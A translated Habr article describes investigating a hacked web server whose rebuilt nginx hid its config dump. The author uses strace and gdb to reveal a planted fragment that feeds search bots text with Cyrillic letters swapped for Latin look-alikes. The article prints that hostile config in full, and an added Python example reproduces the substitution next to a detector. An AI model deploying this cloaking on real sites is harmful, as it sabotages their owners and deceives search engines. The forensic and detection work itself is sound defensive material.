When 'a' is not equal to 'а'. On the trail of a hack

An unpleasant story happened to a friend of mine. But however unpleasant it was for Mikhail, I found it rather entertaining.

I should say that my friend is a decent UNIX user: he can install MySQL and PHP on a system himself and put together simple nginx configurations.
And he has a dozen or a dozen and a half websites devoted to construction tools.

One of these sites, devoted to chainsaws, sits firmly in the TOP of the search engines. The site is a non-commercial review site, but someone got into the habit of attacking it. First DDoS, then brute-force attempts, then they post obscene comments and send complaints to the hosters and to RKN (Roskomnadzor).
Then suddenly everything went quiet, and that quiet turned out to be for the worse: the site slowly began to slip from the top lines of the search results.


That was the preface; now the admin's story itself.

It was almost bedtime when the phone rang: "San, won't you take a look at my server? It seems to me I've been hacked; I can't prove it, but the feeling hasn't left me for the third week. Maybe it's time I got treated for paranoia?"

What followed was a half-hour conversation that can be summarized like this:

  • the ground for a break-in was fertile;
  • an attacker could have obtained superuser rights;
  • the attack (if there was one) was aimed specifically at this site;
  • the problem areas have since been fixed, and all that remains is to understand whether there was an intrusion;
  • the hack could not have affected the site code and the database.

Regarding the last point.

Only the frontend's white (public) IP faces the outside world. There is no exchange between backend and frontend other than http(s), the users/passwords are different, and no keys have been exchanged. On the grey (private) addresses all ports except 80/443 are closed. The white backend IPs are known only to two admins, whom Mikhail trusts completely.

The frontend runs Debian 9 and, by the time of the call, the system had been cut off from the outside world by an external firewall and stopped.

"OK, give me access," I decided to put off sleep for an hour. "I'll see for myself."

Here and below:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Looking for a possible hack

I start the server, first in rescue mode. I mount the disks and leaf through the auth logs, the shell history, the system logs and so on; where possible I check file creation dates, though I understand that an intruder would most likely have "swept up" after himself, and Misha had already "trampled" over a lot while searching on his own.

I boot in normal mode and, before I really know what to look for, I study the configuration. nginx interests me first of all, since in practice nothing else sits in front of it.
The configs are small and neatly laid out in a dozen files; I simply cat them one by one. Everything looks clean, but you never know whether you have missed some include, so let me dump the whole thing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I don't get it: "Where is the dump?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question joins the first: "Why such an old nginx version?"

Moreover, the system believes the current version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Wait, I don't even know how to do that!
- Well, go to sleep...

nginx has clearly been rebuilt, and the config dump via "-T" has been hidden for a reason. There is no longer any doubt about the hack; one could simply accept it and (since Misha had replaced the server with a new one anyway) consider the problem solved.
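
The check a practitioner would run at this point, as an added example (not from the article): compare the installed files with the checksums the Debian package shipped, which is what dpkg -V nginx (or debsums nginx) does. A /usr/sbin/nginx that reports 1.10.3 while dpkg records 1.14.2 would show up as a modified file. The script below reimplements that comparison offline on a throw-away fake root so it runs anywhere; the file contents and paths inside demo() are constructed stand-ins, not real package data.

```python
"""Offline illustration of the check `dpkg -V nginx` (or `debsums nginx`) performs:
hash every file a package installed and compare with the md5sums list the
package shipped.

Added example, not code from the original article. It builds a throw-away fake
root with a constructed md5sums list; on a real Debian host the list is
/var/lib/dpkg/info/<package>.md5sums and the paths are relative to /.
"""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def parse_md5sums(text: str) -> dict[str, str]:
    """Parse `<md5hex>  <relative path>` lines into {path: digest}."""
    entries: dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, rel_path = line.split(None, 1)
        entries[rel_path] = digest.lower()
    return entries


def md5_of(path: Path) -> str:
    """Stream the file through MD5 (the digest dpkg's md5sums lists use)."""
    h = hashlib.md5()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_package(root: Path, md5sums_text: str) -> dict[str, str]:
    """Return {relative path: 'ok' | 'MODIFIED' | 'MISSING'} for every listed file."""
    results: dict[str, str] = {}
    for rel_path, expected in parse_md5sums(md5sums_text).items():
        p = root / rel_path
        if not p.is_file():
            results[rel_path] = "MISSING"
        elif md5_of(p) != expected:
            results[rel_path] = "MODIFIED"
        else:
            results[rel_path] = "ok"
    return results


def demo() -> dict[str, str]:
    """Constructed scenario: the packaged nginx binary was replaced by a rebuild,
    a data file is untouched and a documentation file was deleted."""
    packaged_binary = b"stand-in for the nginx binary the .deb shipped\n"
    rebuilt_binary = b"stand-in for the attacker's rebuilt nginx\n"
    index_html = b"<html>Welcome to nginx!</html>\n"
    # md5sums as the package would have shipped them (digests of the ORIGINAL files)
    md5sums = (
        f"{hashlib.md5(packaged_binary).hexdigest()}  usr/sbin/nginx\n"
        f"{hashlib.md5(index_html).hexdigest()}  usr/share/nginx/html/index.html\n"
        f"{hashlib.md5(b'changelog').hexdigest()}  usr/share/doc/nginx/changelog.gz\n"
    )
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "usr/sbin").mkdir(parents=True)
        (root / "usr/share/nginx/html").mkdir(parents=True)
        (root / "usr/sbin/nginx").write_bytes(rebuilt_binary)               # swapped binary
        (root / "usr/share/nginx/html/index.html").write_bytes(index_html)  # intact file
        # changelog.gz is deliberately not created -> reported as MISSING
        return verify_package(root, md5sums)


if __name__ == "__main__":
    for path, state in demo().items():
        print(f"{state:9} {path}")
```

Caveat: after a root compromise the md5sums files under /var/lib/dpkg/info are just as editable as the binary, so a clean result proves little; compare against a freshly downloaded copy of the package (apt-get download nginx, then dpkg-deb --fsys-tarfile) or, as the article concludes, reinstall.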

And really, since someone obtained root rights, the only sensible step is to reinstall the system, and hunting for what exactly was wrong in it is pointless; but this time curiosity won out over sleep. How do we find out what they wanted to hide from us?

Let's try tracing:

$ strace nginx -T

Looking through it, the output is clearly short of lines like

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare what we get.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I suppose the section of code in /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so the dump with "-T" is not shown.

But how do we see our config?

If my reasoning is correct and the problem is only in the ngx_dump_config variable, let's try to set it with gdb; luckily the build has the -g flag in --with-cc-opt, and let's hope the -O2 optimization won't get in our way. At the same time, since I don't know how ngx_dump_config might be handled inside case 'T':, we won't enter that block at all but will set the variable while running under case 't':.

Why both '-t' and '-T' work: the if (ngx_dump_config) block is handled inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Of course, if the code had been changed in this section rather than inside case 'T':, my method would not work.

Test nginx.conf

Since the problem had already been solved by experiment, it was confirmed that a minimal nginx config is enough for the malware to work:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We'll use it for brevity in the article.

Start the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

In short:

  • set a breakpoint in the main() function
  • start the program
  • change the value of the variable that controls the config output: ngx_dump_config=1
  • continue / let the program finish

As we can see, the real config differs from ours; let's extract the parasitic fragment from it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's look at what is going on here, in order.

The User-Agent of the yandex/google bots is detected:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

WordPress service pages are not touched:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for those who fall under all of the above,

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of the HTML pages it replaces Cyrillic 'о' with Latin 'o' and Cyrillic 'а' with Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

That's all; the only trick is that 'a' != 'а' and 'o' != 'о' (Latin on the left, Cyrillic on the right).

So search-engine bots receive, instead of the normal 100% Cyrillic text, a modified mess seasoned with Latin 'a' and 'o'. I won't venture to discuss how this affects SEO, but it's unlikely that such a jumble of characters ranks well in the search results.
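
To make the recovered rules concrete, here is an added example (my code, not the article's and not the attacker's config) that models the three map blocks and the two sub_filter directives in Python and then runs a detector over the result. The HTML sample and the User-Agent strings are constructed. The detector generalizes the observation 'a' != 'а': any word that mixes Latin and Cyrillic letters is flagged, whichever letters were swapped.

```python
"""Model of the cloaking rules in the recovered nginx config, plus a detector
for the mixed-script text they produce.

Added example, not code from the original article or from the attacker's
config. The HTML sample and User-Agent strings below are constructed.
"""
from __future__ import annotations

import re
import unicodedata

CYR_A, CYR_O = "\u0430", "\u043e"   # Cyrillic 'а' and 'о'
LAT_A, LAT_O = "a", "o"             # their Latin look-alikes

# map $http_user_agent $sign_user_agent { "~*yandex.com/bots" 1; "~*www.google.com/bot.html" 1; default 0; }
BOT_UA = re.compile(r"yandex.com/bots|www.google.com/bot.html", re.IGNORECASE)
# map $uri $sign_uri { "~*/wp-" 1; default 0; }
WP_URI = re.compile(r"/wp-", re.IGNORECASE)


def sign_user_agent(user_agent: str) -> int:
    return 1 if BOT_UA.search(user_agent) else 0


def sign_uri(uri: str) -> int:
    return 1 if WP_URI.search(uri) else 0


def is_cloaked(user_agent: str, uri: str) -> bool:
    """The combined maps yield Latin letters only for the key 'о:1:0' / 'а:1:0',
    i.e. a bot User-Agent AND a URI outside /wp-."""
    return sign_user_agent(user_agent) == 1 and sign_uri(uri) == 0


def cloak(user_agent: str, uri: str, body: str) -> str:
    """What the two sub_filter directives do to a response body.
    For every other request the maps return the Cyrillic letter itself, so the
    replacement is a no-op. Modelled as an exact byte match: sub_filter's case
    folding only covers ASCII, so uppercase Cyrillic is left alone."""
    if not is_cloaked(user_agent, uri):
        return body
    # sub_filter_once off -> every occurrence is replaced, not just the first
    return body.replace(CYR_O, LAT_O).replace(CYR_A, LAT_A)


def script_of(ch: str) -> str:
    """'Latin', 'Cyrillic' or 'Other' for letters; '' for non-letters."""
    if not ch.isalpha():
        return ""
    name = unicodedata.name(ch, "")
    if name.startswith("LATIN"):
        return "Latin"
    if name.startswith("CYRILLIC"):
        return "Cyrillic"
    return "Other"


def mixed_script_words(text: str) -> list[str]:
    """Words whose letters come from more than one script: the fingerprint a
    crawler (or a diff of two fetches) shows after the substitution."""
    hits = []
    for word in re.findall(r"\w+", text):
        scripts = {s for s in map(script_of, word) if s}
        if len(scripts) > 1:
            hits.append(word)
    return hits


# Constructed sample page and request headers
SAMPLE_HTML = "<p>Бензопила для дачи и сада</p>"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"

if __name__ == "__main__":
    cases = [(BROWSER_UA, "/chainsaws/"), (GOOGLEBOT_UA, "/chainsaws/"), (GOOGLEBOT_UA, "/wp-login.php")]
    for ua, uri in cases:
        view = cloak(ua, uri, SAMPLE_HTML)
        label = "bot" if "bot.html" in ua else "browser"
        print(f"{label:8} {uri:16} mixed-script words: {mixed_script_words(view) or 'none'}")
```

On a live server the same check is two fetches of one page, once with a browser User-Agent and once with a Googlebot one (curl -A), followed by mixed_script_words over both bodies; a clean browser view next to a flagged bot view is the cloaking caught in the act, whatever the config hides.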

What can I say, guys with imagination.

References

Debugging with GDB
gdb(1) - Linux man page
strace(1) - Linux man page
Nginx - Module ngx_http_sub_module
About saws, chainsaws and electric saws

Source: www.habr.com
